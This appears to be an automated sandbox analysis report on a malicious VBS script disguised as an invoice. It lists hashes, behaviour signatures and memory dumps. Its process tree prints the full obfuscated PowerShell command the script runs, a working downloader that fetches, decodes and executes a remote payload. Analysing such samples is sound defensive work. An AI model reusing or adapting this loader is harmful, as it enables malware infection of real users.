Overview

overview

10

Static

static

1

Faktúra P...71.vbs

windows7-x64

10

Faktúra P...71.vbs

windows10-2004-x64

7

Analysis

  • max time kernel
    148s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240221-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240221-enlocale:en-usos:windows10-2004-x64system
  • submitted
    21/02/2024, 13:11

Sharing

Copy URL Twitter E-mail
Report Analysis Logs

General

  • Target

    Faktúra PMC 180222SK24 & #160222SK71.vbs

  • Size

    9KB

  • MD5

    c274599f81b62b991e411bfc33a61452

  • SHA1

    fc82a711944cf2d8928ebefca07686901c39b9b2

  • SHA256

    f26dc7069c57ff58f49105f7b6df0e9e467bde973a9eac5f5abc75511f83a825

  • SHA512

    c5627bd8f9230099d2b5255c43e5e80e81d1dcce65e64f61f4250ec27a5db17eb341f3ba8221aa268c6f9cbc9c2b49d6d06d1762967a0e77dbc95e519520f961

  • SSDEEP

    192:JtgQv8hyRUSN1dXbZj2nst2DhkVWfk3y6aRYlKoQgMWXcMJN:vnv8Mh1dXIsuk0Gy6aR7XWXcW

Score
7/10

Malware Config

Signatures

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Faktúra PMC 180222SK24 & #160222SK71.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3668
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Lysaare='Recipr:\Futiliz';Set-Content $Lysaare 'Krick';$Tommels=Test-Path $Lysaare;if($Tommels){exit};function Accommodab9 ($Vrisse){For($Opslutni=4; $Opslutni -lt $Vrisse.Length-1; $Opslutni+=5){$Pister=$Pister+$Vrisse.'Substring'($Opslutni, 1)};$Pister;}$Unvent=Accommodab9 'antehVanetLaketpigepSigbsSeri:Adon/Sags/protd fyrrHetei frivFutue Fje.Biphg halo BefoPrecg danl aaseOrth.Corpc OveoUnsumunte/KolbubillcMime? CapeForkxEftep Uddo UncrSupetDeco=PeppdEtymoAuxiw MisnImbelStamoGypsaBesldTing& Uniiformd Sub= Unc1 Non2PalatBandYFyldKNedrPInfr6EgilLSatuO Rad2BestpNejsXMemb5 OtiRStamXAttedIncrS ConvItal3CathuStyrcefteF Mag9ChamnKaraZTrisVTrvloBelim JakDUdva5 ModOLaurd pom7Sama ';$Pister01=Accommodab9 'Latei SeieOmegxPris ';$Appletstue = Accommodab9 ' Afs\SabesPriny RonsOpdawBetio DekwOmgj6Dipl4Joro\ IndWIrreiGastnCompdAutooLaasw VissEvanP SpeoBeblw Pede FolrTheiS ProhunrieVisil Timl Lng\Aposv Boo1 Pen.Sepa0Musi\Chasp CrioEnanwBrneeSiturEklisAuthhMandeDrenl Uprl For. KaleFormxkonsealmu ';&($Pister01) (Accommodab9 'Hear$heriRAllueArbecinteiGrewpNougr Acc2Unde=Seri$ZooseTrannArbevArch:ScenwHippi KarnOverdNibei UdlrMarb ') ;&($Pister01) (Accommodab9 'Recu$GensATaglp Ovep HaalDesteSmaatFagosSalvtEarhu StieKokk= Uns$PuerRTemieStaac BayiUdfopDirerDisk2 Skr+Tour$HaabALovmpArkipethilyarbeSupet FifsTilltPantuTypeeChol ') ;&($Pister01) (Accommodab9 'Jger$BuntaUnfrr GrntunluiMegalUdbalFors Conc=Brnd Cras(Haar(Sumpg Impw KatmTouriFres Ejerw GruiIdennolym3Leuc2Hagg_PlappBeskrSlamo KvacKookeeluts MagsDebu Ant-ErigFUdlb OpsoP Chir SquoDucecTyveeDisssAlfosTotaIExamdThur= Pro$Glaz{baigPLudeIForeDFort}Rava)Mrke.esprCTryko VenmTropm BomaStrin TotdShalL Occi casnKvajeRipp)cycl Chon-KanasSkafpSkaml SkoiInextSkra Trou[DishcOarihScria Loarnedr]Sprj3kata4bris ');&($Pister01) (Accommodab9 'Over$GenoSBegapSamgoCapcrUnarv ShieJacojSpagsKont Sna=Unco Kult$RetiaSelvrVitit NoaiOverlEcstlStaf[Flam$ expaTredrHebrtChani UdklBombl Bes.Gitoc SteointeuImminRudetTran-Bluf2Dobb]Unpu ');&($Pister01) (Accommodab9 ' Lng$ArbeMOmbraTrykr Revg Evaische=Forh(BrynTUnsueEndosAnelt Mud-TeutPSiphaKladtPreihasyl Leth$DemoAPistpKassp Sepl ForeGermtTretsMicrt AduudomeeOgen)Bath Diop-TillAOvernBaptdFags Gene(Coen[ForsIInexnWhattjyttP NontAkkorindf] Sko:kseb:CorrsOptaiRkerzBuddeLati Nays-RadieKejsqEnke Stau8Isog)gard ') ;if ($Margi) {&$Appletstue $Sporvejs;} else {;$Pister00=Accommodab9 'NonsSudstt PoeaTrumrDesctBesp-CocrBSpumi MestIteasStokTFundrAppoaVitrnKontsRaynfAnureInvorDepe Drej-KiltS Aero ReduKeybrSjlecPredeRemi Reda$StepU Iron UmuvLysieHetenUldetStor Tra- GraDPleneChorsNatbtTraviSlannIntuaMorptisomi NesoSekunSejl Nova$ OrtRManneUnascCilai Pitp blarModa2Diph ';&($Pister01) (Accommodab9 'Achi$FredRVordeSymmcAlmiiLevepinderUrta2Dive=Leje$LedseMercnLedivStor:Bulba SempHrbapFritdpaupaKimotAmpha una ') ;&($Pister01) (Accommodab9 'UnneISydsmOkkepKvlloForbrUnhut Bea-KamiMYounoTracdFlesugtehlRealeNonr SeniBGnaviLovet buzsNettTSivnrAbsoaJndmnVikasFormfUndeeEpidrLder ') ;$Recipr2=$Recipr2+'\Reagicrhe.Rut';while (-not $Laasemeka) {&($Pister01) (Accommodab9 ' Din$ EksLudviaAnekaFreds ChaeImpam AnteVejgkleasaTint= Sno(SpriT Stre JossArbetDith-ressPAfreaAttrtcisthWell Bast$SlhuRharmeantacKnipiTruspFrigrSomn2Wess) Unf ') ;&($Pister01) $Pister00;&($Pister01) (Accommodab9 'UnstSChint DilaDentr EnctPhil-TidsSLrealUngle GlueNavepOrdb Bese5Glit ');}&($Pister01) (Accommodab9 'alky$EmboAMinicForscAfhjo ThemKronmStenoPanndFortascrabAcro For=Fors GalaGBrioeBarntnonv-SubcCImpuo DisnVejstSangeSparnKonttSoot Glas$EyebR PleePermcAdrei AnnpGnavrPedo2Bran ');&($Pister01) (Accommodab9 'Cate$UnfeSBladvEggpaTripmLagepParteMangk DagoInds Cumu=Squi Ungi[ borSStvryMuntsMiratHilseUnpam Gly.SammCOrieo BevnChamvUngde BevrNonstVold]Eliq:Seks:CharFOverrBidsoPalimLeafBFlleaSweesTreneSill6rsti4SletSNyret Forr hypi LegnSeorgFlin(Hast$FremABlodcPsyccSprooCachmPambm KlroAfled UncaVenebPlis)Slge ');&($Pister01) (Accommodab9 'Ceto$CellP TraiMexisXerotOffeeNontrMagn2Club Nyin=Disa Sand[ImusS UntyStres PoltStikeTuftmRica.StyrTvkkeeDespxUdsmt Taa.AlfaEUdskn JakcIneaoteeldgrioilordnHandgLeis]Unnu:fors: BriA IntSUnexCFingIDydsIOmga. AsyGIndheKorttSdebSSlastOverrCeltiemulnBoilgNonc(Cath$LizaSOvervOrgaaTrykmfrikpDepoeGrankTongolill)cont ');&($Pister01) (Accommodab9 ' Par$BortwSprohFodsiGenigslav= The$RokePCompiDevesTekstEroteKassrWild2 Til.BversGeneuLegebOversvolutSkilrAnegi CrynNitrg Whe(Pseu3Juan1Reds9 Bur6 Udb6acan1Last, Kde2 Ost7gran6 Lib5Marq7Renl)Skam ');&($Pister01) $whig;}"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:448
      • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Lysaare='Recipr:\Futiliz';Set-Content $Lysaare 'Krick';$Tommels=Test-Path $Lysaare;if($Tommels){exit};function Accommodab9 ($Vrisse){For($Opslutni=4; $Opslutni -lt $Vrisse.Length-1; $Opslutni+=5){$Pister=$Pister+$Vrisse.'Substring'($Opslutni, 1)};$Pister;}$Unvent=Accommodab9 'antehVanetLaketpigepSigbsSeri:Adon/Sags/protd fyrrHetei frivFutue Fje.Biphg halo BefoPrecg danl aaseOrth.Corpc OveoUnsumunte/KolbubillcMime? CapeForkxEftep Uddo UncrSupetDeco=PeppdEtymoAuxiw MisnImbelStamoGypsaBesldTing& Uniiformd Sub= Unc1 Non2PalatBandYFyldKNedrPInfr6EgilLSatuO Rad2BestpNejsXMemb5 OtiRStamXAttedIncrS ConvItal3CathuStyrcefteF Mag9ChamnKaraZTrisVTrvloBelim JakDUdva5 ModOLaurd pom7Sama ';$Pister01=Accommodab9 'Latei SeieOmegxPris ';$Appletstue = Accommodab9 ' Afs\SabesPriny RonsOpdawBetio DekwOmgj6Dipl4Joro\ IndWIrreiGastnCompdAutooLaasw VissEvanP SpeoBeblw Pede FolrTheiS ProhunrieVisil Timl Lng\Aposv Boo1 Pen.Sepa0Musi\Chasp CrioEnanwBrneeSiturEklisAuthhMandeDrenl Uprl For. KaleFormxkonsealmu ';&($Pister01) (Accommodab9 'Hear$heriRAllueArbecinteiGrewpNougr Acc2Unde=Seri$ZooseTrannArbevArch:ScenwHippi KarnOverdNibei UdlrMarb ') ;&($Pister01) (Accommodab9 'Recu$GensATaglp Ovep HaalDesteSmaatFagosSalvtEarhu StieKokk= Uns$PuerRTemieStaac BayiUdfopDirerDisk2 Skr+Tour$HaabALovmpArkipethilyarbeSupet FifsTilltPantuTypeeChol ') ;&($Pister01) (Accommodab9 'Jger$BuntaUnfrr GrntunluiMegalUdbalFors Conc=Brnd Cras(Haar(Sumpg Impw KatmTouriFres Ejerw GruiIdennolym3Leuc2Hagg_PlappBeskrSlamo KvacKookeeluts MagsDebu Ant-ErigFUdlb OpsoP Chir SquoDucecTyveeDisssAlfosTotaIExamdThur= Pro$Glaz{baigPLudeIForeDFort}Rava)Mrke.esprCTryko VenmTropm BomaStrin TotdShalL Occi casnKvajeRipp)cycl Chon-KanasSkafpSkaml SkoiInextSkra Trou[DishcOarihScria Loarnedr]Sprj3kata4bris ');&($Pister01) (Accommodab9 'Over$GenoSBegapSamgoCapcrUnarv ShieJacojSpagsKont Sna=Unco Kult$RetiaSelvrVitit NoaiOverlEcstlStaf[Flam$ expaTredrHebrtChani UdklBombl Bes.Gitoc SteointeuImminRudetTran-Bluf2Dobb]Unpu ');&($Pister01) (Accommodab9 ' Lng$ArbeMOmbraTrykr Revg Evaische=Forh(BrynTUnsueEndosAnelt Mud-TeutPSiphaKladtPreihasyl Leth$DemoAPistpKassp Sepl ForeGermtTretsMicrt AduudomeeOgen)Bath Diop-TillAOvernBaptdFags Gene(Coen[ForsIInexnWhattjyttP NontAkkorindf] Sko:kseb:CorrsOptaiRkerzBuddeLati Nays-RadieKejsqEnke Stau8Isog)gard ') ;if ($Margi) {&$Appletstue $Sporvejs;} else {;$Pister00=Accommodab9 'NonsSudstt PoeaTrumrDesctBesp-CocrBSpumi MestIteasStokTFundrAppoaVitrnKontsRaynfAnureInvorDepe Drej-KiltS Aero ReduKeybrSjlecPredeRemi Reda$StepU Iron UmuvLysieHetenUldetStor Tra- GraDPleneChorsNatbtTraviSlannIntuaMorptisomi NesoSekunSejl Nova$ OrtRManneUnascCilai Pitp blarModa2Diph ';&($Pister01) (Accommodab9 'Achi$FredRVordeSymmcAlmiiLevepinderUrta2Dive=Leje$LedseMercnLedivStor:Bulba SempHrbapFritdpaupaKimotAmpha una ') ;&($Pister01) (Accommodab9 'UnneISydsmOkkepKvlloForbrUnhut Bea-KamiMYounoTracdFlesugtehlRealeNonr SeniBGnaviLovet buzsNettTSivnrAbsoaJndmnVikasFormfUndeeEpidrLder ') ;$Recipr2=$Recipr2+'\Reagicrhe.Rut';while (-not $Laasemeka) {&($Pister01) (Accommodab9 ' Din$ EksLudviaAnekaFreds ChaeImpam AnteVejgkleasaTint= Sno(SpriT Stre JossArbetDith-ressPAfreaAttrtcisthWell Bast$SlhuRharmeantacKnipiTruspFrigrSomn2Wess) Unf ') ;&($Pister01) $Pister00;&($Pister01) (Accommodab9 'UnstSChint DilaDentr EnctPhil-TidsSLrealUngle GlueNavepOrdb Bese5Glit ');}&($Pister01) (Accommodab9 'alky$EmboAMinicForscAfhjo ThemKronmStenoPanndFortascrabAcro For=Fors GalaGBrioeBarntnonv-SubcCImpuo DisnVejstSangeSparnKonttSoot Glas$EyebR PleePermcAdrei AnnpGnavrPedo2Bran ');&($Pister01) (Accommodab9 'Cate$UnfeSBladvEggpaTripmLagepParteMangk DagoInds Cumu=Squi Ungi[ borSStvryMuntsMiratHilseUnpam Gly.SammCOrieo BevnChamvUngde BevrNonstVold]Eliq:Seks:CharFOverrBidsoPalimLeafBFlleaSweesTreneSill6rsti4SletSNyret Forr hypi LegnSeorgFlin(Hast$FremABlodcPsyccSprooCachmPambm KlroAfled UncaVenebPlis)Slge ');&($Pister01) (Accommodab9 'Ceto$CellP TraiMexisXerotOffeeNontrMagn2Club Nyin=Disa Sand[ImusS UntyStres PoltStikeTuftmRica.StyrTvkkeeDespxUdsmt Taa.AlfaEUdskn JakcIneaoteeldgrioilordnHandgLeis]Unnu:fors: BriA IntSUnexCFingIDydsIOmga. AsyGIndheKorttSdebSSlastOverrCeltiemulnBoilgNonc(Cath$LizaSOvervOrgaaTrykmfrikpDepoeGrankTongolill)cont ');&($Pister01) (Accommodab9 ' Par$BortwSprohFodsiGenigslav= The$RokePCompiDevesTekstEroteKassrWild2 Til.BversGeneuLegebOversvolutSkilrAnegi CrynNitrg Whe(Pseu3Juan1Reds9 Bur6 Udb6acan1Last, Kde2 Ost7gran6 Lib5Marq7Renl)Skam ');&($Pister01) $whig;}"
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4508
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 4508 -s 2176
          4⤵
          • Program crash
          PID:1304
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 4508 -ip 4508
    1⤵
      PID:2460

    Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bepsh345.1cg.ps1
            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

            Download Submit

          • memory/448-9-0x000001F4C4E40000-0x000001F4C4E62000-memory.dmp

            Filesize

            136KB

            Download

          • memory/448-10-0x00007FFA1F5E0000-0x00007FFA200A1000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/448-12-0x000001F4AA930000-0x000001F4AA940000-memory.dmp

            Filesize

            64KB

            Download

          • memory/448-11-0x000001F4AA930000-0x000001F4AA940000-memory.dmp

            Filesize

            64KB

            Download

          • memory/448-13-0x000001F4AA930000-0x000001F4AA940000-memory.dmp

            Filesize

            64KB

            Download

          • memory/448-42-0x00007FFA1F5E0000-0x00007FFA200A1000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/4508-25-0x00000000062A0000-0x0000000006306000-memory.dmp

            Filesize

            408KB

            Download

          • memory/4508-33-0x0000000007890000-0x0000000007926000-memory.dmp

            Filesize

            600KB

            Download

          • memory/4508-17-0x0000000005AE0000-0x0000000006108000-memory.dmp

            Filesize

            6.2MB

            Download

          • memory/4508-18-0x0000000005A00000-0x0000000005A22000-memory.dmp

            Filesize

            136KB

            Download

          • memory/4508-19-0x00000000061C0000-0x0000000006226000-memory.dmp

            Filesize

            408KB

            Download

          • memory/4508-15-0x0000000074FC0000-0x0000000075770000-memory.dmp

            Filesize

            7.7MB

            Download

          • memory/4508-30-0x0000000006410000-0x0000000006764000-memory.dmp

            Filesize

            3.3MB

            Download

          • memory/4508-31-0x00000000068B0000-0x00000000068CE000-memory.dmp

            Filesize

            120KB

            Download

          • memory/4508-32-0x00000000068F0000-0x000000000693C000-memory.dmp

            Filesize

            304KB

            Download

          • memory/4508-16-0x00000000030F0000-0x0000000003100000-memory.dmp

            Filesize

            64KB

            Download

          • memory/4508-34-0x0000000006DC0000-0x0000000006DDA000-memory.dmp

            Filesize

            104KB

            Download

          • memory/4508-35-0x0000000006E10000-0x0000000006E32000-memory.dmp

            Filesize

            136KB

            Download

          • memory/4508-36-0x0000000007F30000-0x00000000084D4000-memory.dmp

            Filesize

            5.6MB

            Download

          • memory/4508-37-0x0000000008B60000-0x00000000091DA000-memory.dmp

            Filesize

            6.5MB

            Download

          • memory/4508-38-0x0000000007EA0000-0x0000000007EC2000-memory.dmp

            Filesize

            136KB

            Download

          • memory/4508-39-0x00000000084E0000-0x00000000084F4000-memory.dmp

            Filesize

            80KB

            Download

          • memory/4508-40-0x0000000074FC0000-0x0000000075770000-memory.dmp

            Filesize

            7.7MB

            Download

          • memory/4508-14-0x0000000002FA0000-0x0000000002FD6000-memory.dmp

            Filesize

            216KB

            Download